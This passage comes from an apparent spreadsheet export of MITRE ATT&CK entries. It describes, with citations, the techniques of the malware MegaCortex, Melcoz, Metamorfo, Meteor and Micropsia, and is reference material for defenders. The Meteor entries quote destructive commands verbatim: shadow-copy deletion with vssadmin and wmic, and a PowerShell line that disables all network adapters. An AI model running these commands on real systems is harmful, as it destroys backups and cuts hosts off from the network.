    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has used a Base64 key to decode its components.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>relationship--9a36085f-d0a9-41f2-a9cf-97e81c286ef2</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) was used to kill endpoint security processes.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>relationship--51e647f5-b180-4dd8-96b1-464775bfe113</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) can wipe deleted data from all drives using &lt;code&gt;cipher.exe&lt;/code&gt;.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>relationship--8550e43c-ca91-416e-a75a-b6f5f979d457</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) loads &lt;code&gt;injecthelper.dll&lt;/code&gt; into a newly created &lt;code&gt;rundll32.exe&lt;/code&gt; process.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>relationship--71c146b5-9afa-41fa-9339-2a6287e7d309</t>
  </si>
  <si>
    <t xml:space="preserve">[MegaCortex](https://attack.mitre.org/software/S0576) can parse the available drives and directories to determine which files to encrypt.(Citation: IBM MegaCortex) </t>
  </si>
  <si>
    <t>relationship--5cc7ade7-2e21-41a3-8535-4274c138dcc4</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has deleted volume shadow copies using &lt;code&gt;vssadmin.exe&lt;/code&gt;.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>relationship--48c9c2f3-9358-4342-88b7-57c8e5df893b</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has added entries to the Registry for ransom contact information.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>relationship--83d63b2b-f287-4047-bbe4-82c8b100222a</t>
  </si>
  <si>
    <t>After escalating privileges, [MegaCortex](https://attack.mitre.org/software/S0576) calls &lt;code&gt;TerminateProcess()&lt;/code&gt;, &lt;code&gt;CreateRemoteThread&lt;/code&gt;, and other Win32 APIs.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>relationship--bf6a8896-2e07-4ed8-9f51-3847c3b0745f</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has used &lt;code&gt;rundll32.exe&lt;/code&gt; to load a DLL for file encryption.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>relationship--190c819e-d4c9-4fa6-b809-9c7d76c0810a</t>
  </si>
  <si>
    <t xml:space="preserve">[MegaCortex](https://attack.mitre.org/software/S0576) can stop and disable services on the system.(Citation: IBM MegaCortex) </t>
  </si>
  <si>
    <t>relationship--7f58088d-9b5d-46ba-b9e4-fc937ffae294</t>
  </si>
  <si>
    <t xml:space="preserve">[MegaCortex](https://attack.mitre.org/software/S0576) has checked the number of CPUs in the system to avoid being run in a sandbox or emulator.(Citation: IBM MegaCortex) </t>
  </si>
  <si>
    <t>relationship--3cf330d6-3a3c-437f-922b-c1bdce852b71</t>
  </si>
  <si>
    <t xml:space="preserve">[MegaCortex](https://attack.mitre.org/software/S0576) has used &lt;code&gt;.cmd&lt;/code&gt; scripts on the victim's system.(Citation: IBM MegaCortex) </t>
  </si>
  <si>
    <t>relationship--99522819-c6ee-44c1-ac42-5984ae439991</t>
  </si>
  <si>
    <t>S0530</t>
  </si>
  <si>
    <t>Melcoz</t>
  </si>
  <si>
    <t>malware--d3105fb5-c494-4fd1-a7be-414eab9e0c96</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) can monitor the victim's browser for online banking sessions and display an overlay window to manipulate the session in the background.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--577796a0-efbb-4023-9083-a76f97bec6f8</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) can monitor content saved to the clipboard.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--ce8220fc-98ee-4b48-b98c-8be15a429410</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) has been distributed through an AutoIt loader script.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--2a9d9c0a-1c8b-4f80-bdd2-9ba8394cb625</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) has the ability to steal credentials from web browsers.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--91a7667b-592f-45c1-a069-986380d29e71</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) can use DLL hijacking to bypass security controls.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--838b2a37-10a1-42fe-bf71-f298ce28f81f</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) has the ability to download additional files to a compromised host.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--57ad2c1a-785c-46ad-bdf1-2f9afe2389e8</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) has gained execution through victims opening malicious links.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--d38b5509-0587-4128-b18c-123fade07f3a</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) can use MSI files with embedded VBScript for execution.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--331fcf7d-5663-40a9-b86c-be005221e882</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) has been packed with VMProtect and Themida.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--c90424e7-4d58-4b2f-b72e-fc630a1a8199</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) has been spread through malicious links embedded in e-mails.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--e6c6afdc-a52f-405c-8480-a4b2d2d797bf</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) can monitor the clipboard for cryptocurrency addresses and change the intended address to one controlled by the adversary.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--0d1bf687-ad42-45e6-bd52-34c6a14accad</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) can use VBS scripts to execute malicious DLLs.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--9cd7c6d3-95a1-4403-8799-807b9f27509a</t>
  </si>
  <si>
    <t>S0455</t>
  </si>
  <si>
    <t>Metamorfo</t>
  </si>
  <si>
    <t>malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2</t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) can enumerate all windows on the victim’s machine.(Citation: FireEye Metamorfo Apr 2018)(Citation: Fortinet Metamorfo Feb 2020)</t>
  </si>
  <si>
    <t>relationship--ce071226-7abc-492c-918d-96cc195f928d</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455)'s C2 communication has been encrypted using OpenSSL.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t>relationship--104334fa-4d32-48ab-a55d-c481ce7c4cd3</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has automatically collected mouse clicks, continuous screenshots on the machine, and set timers to collect the contents of the clipboard and website browsing.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t>relationship--6caff042-f300-421c-b6c8-6c8dd6d69f1b</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</si>
  <si>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</si>
  <si>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relationship--787f09c0-92fe-4208-96e8-86c8e45c9a40</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has digitally signed executables using AVAST Software certificates.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t>relationship--baeb8449-b956-4119-aea5-717570edb513</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has side-loaded its malicious DLL file.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018)(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t>relationship--44533bc7-0368-4269-b465-7e08d3a8beea</t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has used YouTube to store and hide C&amp;C server domains.(Citation: ESET Casbaneiro Oct 2019)</t>
  </si>
  <si>
    <t>relationship--34fb0f39-9aef-4b49-8a80-2ca457af8565</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</si>
  <si>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</si>
  <si>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relationship--f264330f-3c9f-4a2a-a6f6-904a9139bbf5</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has a function to kill processes associated with defenses and can prevent certain processes from launching.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t>relationship--9a9db72e-71ae-4e00-b723-434dd41855bc</t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has injected a malicious DLL into the Windows Media Player process (wmplayer.exe).(Citation: Medium Metamorfo Apr 2020)</t>
  </si>
  <si>
    <t>relationship--2e418dd3-d6dc-4d02-a555-2b3a13936dc3</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) can send the data it collects to the C2 server.(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t>relationship--4e18e63e-acb5-48fc-8935-eb4416929745</t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has deleted itself from the system after execution.(Citation: Medium Metamorfo Apr 2020)(Citation: Fortinet Metamorfo Feb 2020)</t>
  </si>
  <si>
    <t>relationship--667c0879-3ea2-48f1-9a1b-ceefca33aa43</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</si>
  <si>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</si>
  <si>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relationship--f45f18e9-4a0c-4f22-8ef6-5a18314535ea</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has displayed fake forms on top of banking sites to intercept credentials from victims.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t>relationship--5a56cf34-c344-4b2a-ac9e-4f08f049d7ce</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has hidden its GUI using the ShowWindow() WINAPI call.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t>relationship--ef934eda-a3ad-40fb-8923-fc2f72fb8f6e</t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has a command to delete a Registry key it uses, &lt;code&gt;\Software\Microsoft\Internet Explorer\notes&lt;/code&gt;.(Citation: FireEye Metamorfo Apr 2018)</t>
  </si>
  <si>
    <t>relationship--5246b52e-cb6c-43da-84e5-dff0172abaea</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has used MSI files to download additional files to execute.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018)(Citation: Fortinet Metamorfo Feb 2020)(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t>relationship--de745ef4-59a0-470c-95c9-5043a717dc54</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) includes payloads written in JavaScript.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t>relationship--07f72efd-7960-4530-92f3-6ced33087212</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has a command to launch a keylogger and capture keystrokes on the victim’s machine.(Citation: Fortinet Metamorfo Feb 2020)(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t>relationship--0c2259d0-2d56-4bbc-bd98-e35ac991b6e8</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) requires the user to double-click the executable to run the malicious HTA file or to download a malicious installer.(Citation: FireEye Metamorfo Apr 2018)(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t>relationship--21cd565f-4cdc-46d6-95b3-32b2d618674e</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</si>
  <si>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</si>
  <si>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relationship--d6829fd4-7c9b-495f-9689-d1be1939f99e</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</si>
  <si>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</si>
  <si>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relationship--676c5a2a-323b-4166-9c83-8c6e5e25bb1f</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has used mshta.exe to execute a HTA payload.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t>relationship--7643698c-2dc4-43ca-9d90-c656962dfecb</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has used MsiExec.exe to automatically execute files.(Citation: Fortinet Metamorfo Feb 2020)(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t>relationship--184ee176-b599-4586-b1fc-5758c91a0c23</t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has used native WINAPI calls.(Citation: Medium Metamorfo Apr 2020)(Citation: Fortinet Metamorfo Feb 2020)</t>
  </si>
  <si>
    <t>relationship--3c132a1b-053d-450b-8a4f-cabf30317075</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has used raw TCP for C2.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t>relationship--4bd30351-b64b-47cb-897b-951b76ca668b</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has communicated with hosts over raw TCP on port 9999.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t>relationship--6cc8e1ce-c007-4a26-bd3b-cac73bb98c73</t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has encrypted payloads and strings.(Citation: Medium Metamorfo Apr 2020)(Citation: ESET Casbaneiro Oct 2019)</t>
  </si>
  <si>
    <t>relationship--3a299dae-7ee2-4e5e-8be6-eb014f58205b</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has downloaded a zip file for execution on the system.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018)(Citation: Fortinet Metamorfo Feb 2020) </t>
  </si>
  <si>
    <t>relationship--68e18f32-aae3-4bd6-b8e5-6ec2ec3d4173</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has performed process name checks and has monitored applications.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t>relationship--eac61f60-a87d-4f83-b5e0-64542efeca6b</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</si>
  <si>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</si>
  <si>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relationship--4be5482c-2a58-41af-a7d7-477c596b4622</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) can collect screenshots of the victim’s machine.(Citation: FireEye Metamorfo Apr 2018)(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t>relationship--b5d200f9-2b85-46c8-980a-0692e49ccdfc</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) collects a list of installed antivirus software from the victim’s system.(Citation: Fortinet Metamorfo Feb 2020)(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t>relationship--0f5c39a8-edc1-4da2-941a-56e17b32abe4</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) had used AutoIt to load and execute the DLL payload.(Citation: Fortinet Metamorfo Feb 2020) </t>
  </si>
  <si>
    <t>relationship--79cb18f3-0640-4b9d-9e93-62e3300f99d8</t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has searched the compromised system for banking applications.(Citation: FireEye Metamorfo Apr 2018)(Citation: ESET Casbaneiro Oct 2019)</t>
  </si>
  <si>
    <t>relationship--082b64f6-cc70-4bc8-a49f-bf0f125883f7</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has used VMProtect to pack and protect files.(Citation: Fortinet Metamorfo Feb 2020) </t>
  </si>
  <si>
    <t>relationship--c9747fcc-b249-49cc-8f8b-aad9e89bdc31</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has been delivered to victims via emails with malicious HTML attachments.(Citation: FireEye Metamorfo Apr 2018)(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t>relationship--4852a801-3cd3-4a97-90ef-8cb5974c80d9</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has encrypted C2 commands with AES-256.(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t>relationship--eeccfd34-bc7a-4a94-bc27-3f5f20063ee7</t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has collected the hostname and operating system version from the compromised host.(Citation: FireEye Metamorfo Apr 2018)(Citation: Fortinet Metamorfo Feb 2020)(Citation: ESET Casbaneiro Oct 2019)</t>
  </si>
  <si>
    <t>relationship--8a8afe63-a754-40e3-98af-cfc3f0aa6ef5</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has collected the username from the victim's machine.(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t>relationship--cea7b276-d2be-4af4-adaf-28eb26079098</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) uses JavaScript to get the system time.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t>relationship--4a990ccb-7004-43b8-9328-37668e1a3b6d</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</si>
  <si>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</si>
  <si>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relationship--ad7b6185-bdb1-4271-b139-2d71dd85c0d4</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has embedded a "vmdetect.exe" executable to identify virtual machines at the beginning of execution.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t>relationship--6176ae5b-cd96-4b15-8539-5fb6e230fd5d</t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has used VBS code on victims’ systems.(Citation: FireEye Metamorfo Apr 2018)</t>
  </si>
  <si>
    <t>relationship--eed0e9c9-f849-4938-b243-5f6692d94b6b</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has used HTTP for C2.(Citation: Medium Metamorfo Apr 2020)(Citation: ESET Casbaneiro Oct 2019) </t>
  </si>
  <si>
    <t>relationship--168f47ab-980f-4e10-91f4-ffd2acf09a7f</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has used &lt;code&gt;cmd.exe /c&lt;/code&gt; to execute files.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t>relationship--c7735813-64b9-47ba-8d98-81e7bfc25a80</t>
  </si>
  <si>
    <t>S0688</t>
  </si>
  <si>
    <t>Meteor</t>
  </si>
  <si>
    <t>malware--d79e7a60-5de9-448e-a074-f95d2d80f8d0</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) has the ability to change the password of local users on compromised hosts and can log off users.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>relationship--9a8901ea-5cb3-431f-9be8-55986ea41448</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) can use [Wevtutil](https://attack.mitre.org/software/S0645) to remove Security, System and Application Event Viewer logs.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>relationship--0fa4f714-e906-4878-b556-788946a453b0</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) can fill a victim's files and directories with zero-bytes in replacement of real content before deleting them.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>relationship--e0cbaae4-9a39-4da4-a0a2-8c60dfa8e0c8</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) can attempt to uninstall Kaspersky Antivirus or remove the Kaspersky license; it can also add all files and folders related to the attack to the Windows Defender exclusion list.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>relationship--8205a216-c51d-4497-8874-f2de40526621</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) will delete the folder containing malicious scripts if it detects the hostname as `PIS-APP`, `PIS-MOB`, `WSUSPROXY`, or `PIS-DB`.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>relationship--ee8711e0-dd0e-4730-9b85-bd55fb6d590e</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) can use group policy to push a scheduled task from the AD to all network machines.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>relationship--f9b7c51c-fcb1-4cf7-b19d-ecd92291326c</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) can hide its console window upon execution to decrease its visibility to a victim.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>relationship--c3e3d9d3-6fd2-43a0-ba72-bf7c259768d5</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) has the ability to download additional files for execution on the victim's machine.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>relationship--201f9d85-be41-4aeb-984f-6ece40d4177d</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) can use `bcdedit` to delete different boot identifiers on a compromised host; it can also use `vssadmin.exe delete shadows /all /quiet` and `C:\\Windows\\system32\\wbem\\wmic.exe shadowcopy delete`.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>relationship--cd38ce72-655d-40f5-afbc-5a9ad0624a6a</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) can change both the desktop wallpaper and the lock screen image to a custom image.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>relationship--78c0b480-23c1-4de7-867e-d4e9ef4c8df6</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) has been disguised as the Windows Power Efficiency Diagnostics report tool.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>relationship--349025c3-f266-41ce-a738-330b5e7f1b4e</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) can use `WinAPI` to remove a victim machine from an Active Directory domain.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>relationship--717cce1c-bbb9-4735-80d0-3d13ea56f248</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) can use PowerShell commands to disable the network adapters on a victim machines.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>relationship--87911fd7-8058-4d6f-99d0-68021a94357e</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) can check if a specific process is running, such as Kaspersky's `avp.exe`.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>relationship--f07c1f84-a2c0-4c47-904d-ce96b36307f0</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</si>
  <si>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</si>
  <si>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relationship--7c9b1259-47e5-41af-b5d5-5b8b25d0bdd2</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) has the ability to search for Kaspersky Antivirus on a victim's machine.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>relationship--e23abec4-6a31-48c7-8857-e37951caebab</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) can disconnect all network adapters on a compromised host using `powershell -Command "Get-WmiObject -class Win32_NetworkAdapter | ForEach { If ($.NetEnabled) { $.Disable() } }" &gt; NUL`.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>relationship--0f677d2e-2cff-4b9f-ae1b-621a5e856b08</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) has the ability to discover the hostname of a compromised host.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>relationship--c3893875-4f9e-43e4-babf-6f45ec485444</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) can run `set.bat`, `update.bat`, `cache.bat`, `bcd.bat`, `msrun.bat`, and similar scripts.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>relationship--c7c4f5fa-82f9-4851-a6af-3a7d402e405d</t>
  </si>
  <si>
    <t>[Meteor](https://attack.mitre.org/software/S0688) can use `wmic.exe` as part of its effort to delete shadow copies.(Citation: Check Point Meteor Aug 2021)</t>
  </si>
  <si>
    <t>relationship--0182aa0a-a8b9-4a6e-9932-88f34f8ceee3</t>
  </si>
  <si>
    <t>S0339</t>
  </si>
  <si>
    <t>Micropsia</t>
  </si>
  <si>
    <t>malware--8c050cea-86e1-4b63-bf21-7af4fa483349</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) creates a RAR archive based on collected files on the victim's machine.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>relationship--96d8b8bb-3bdc-481e-a554-41790acac66a</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) can perform microphone recording.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>relationship--cff7d7e5-a279-4499-9b03-0cb47ac6b25c</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) executes an RAR tool to recursively archive files based on a predefined list of file extensions (*.xls, *.xlsx, *.csv, *.odt, *.doc, *.docx, *.ppt, *.pptx, *.pdf, *.mdb, *.accdb, *.accde, *.txt).(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>relationship--12c94395-26b4-46a5-bb10-dab19b5f1a30</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) can perform a recursive directory listing for all volume drives available on the victim's machine and can also fetch specific files by their paths.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>relationship--19f512b8-6869-460d-97d8-7e1f9b3c51cb</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) creates a new hidden directory to store all components' outputs in a dedicated sub-folder for each.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>relationship--d8c933d5-f44d-4e3b-ae15-f94518320995</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) can download and execute an executable from the C2 server.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>relationship--7ec1ddbb-57d1-4530-97d1-dd5d02cd3eb2</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) has keylogging capabilities.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>relationship--15d01a81-5d77-4373-81d0-8962e708ad20</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) obfuscates the configuration with a custom Base64 and XOR.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>relationship--a2c59195-f81a-4ed1-8d64-7137f961a835</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) takes screenshots every 90 seconds by calling the Gdi32.BitBlt API.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>relationship--b8a7be73-89a5-4689-8eea-280b745bd3cc</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) searches for anti-virus software and firewall products installed on the victim’s machine using WMI.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>relationship--14a9f873-cb86-4238-b6c6-8b0836512fdc</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) creates a shortcut to maintain persistence.(Citation: Talos Micropsia June 2017)</t>
  </si>
  <si>
    <t>relationship--583d2c3b-dd25-4f83-812a-d38cee3cdeef</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) gathers the hostname and OS version from the victim’s machine.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>relationship--002c9202-d7a0-4181-b912-42f7d6d38339</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) collects the username from the victim’s machine.(Citation: Talos Micropsia June 2017)</t>
  </si>
  <si>
    <t>relationship--693372c1-418e-45c3-9b0e-0c21d705d1d2</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) uses HTTP and HTTPS for C2 network communications.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>relationship--a0fade5f-6f66-415d-b078-f7ebf9542a63</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) creates a command-line shell using cmd.exe.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>relationship--4261a057-4985-4180-8871-59c5b76e8a20</t>
  </si>
  <si>
    <t>relationship--dd050277-bfac-41ba-a40f-7970f2d36189</t>
  </si>
  <si>
